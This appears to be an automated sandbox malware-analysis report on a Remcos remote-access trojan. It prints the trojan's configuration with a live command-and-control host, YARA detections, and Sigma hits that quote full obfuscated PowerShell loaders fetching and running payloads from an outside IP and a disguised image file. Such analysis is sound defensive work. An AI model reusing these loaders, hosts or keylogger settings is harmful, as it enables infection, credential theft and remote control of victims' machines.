{"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 45 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              30.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                30.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  30.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    30.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6c4b8:$a1: Remcos restarted by watchdog!
                    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                    30.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x6657c:$str_b2: Executing file:
                    • 0x675fc:$str_b3: GetDirectListeningPort
                    • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x67128:$str_b7: \update.vbs
                    • 0x665a4:$str_b9: Downloaded file:
                    • 0x66590:$str_b10: Downloading file:
                    • 0x66634:$str_b12: Failed to upload file:
                    • 0x675c4:$str_b13: StartForward
                    • 0x675e4:$str_b14: StopForward
                    • 0x67080:$str_b15: fso.DeleteFile "
                    • 0x67014:$str_b16: On Error Resume Next
                    • 0x670b0:$str_b17: fso.DeleteFolder "
                    • 0x66624:$str_b18: Uploaded file:
                    • 0x665e4:$str_b19: Unable to delete:
                    • 0x67048:$str_b20: while fso.FileExists("
                    • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 29 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3Nl
                    Sigma detected: File With Uncommon Extension Created By An Office Application
                    Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3480, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newthingtobeonlinefor[1].hta
                    Sigma detected: Potential PowerShell Command Line Obfuscation
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSA
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSA
                    Sigma detected: Potentially Suspicious PowerShell Child Processes
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 4080, ProcessName: wscript.exe
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3Nl
                    Sigma detected: PowerShell Base64 Encoded Invoke Keyword
                    Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 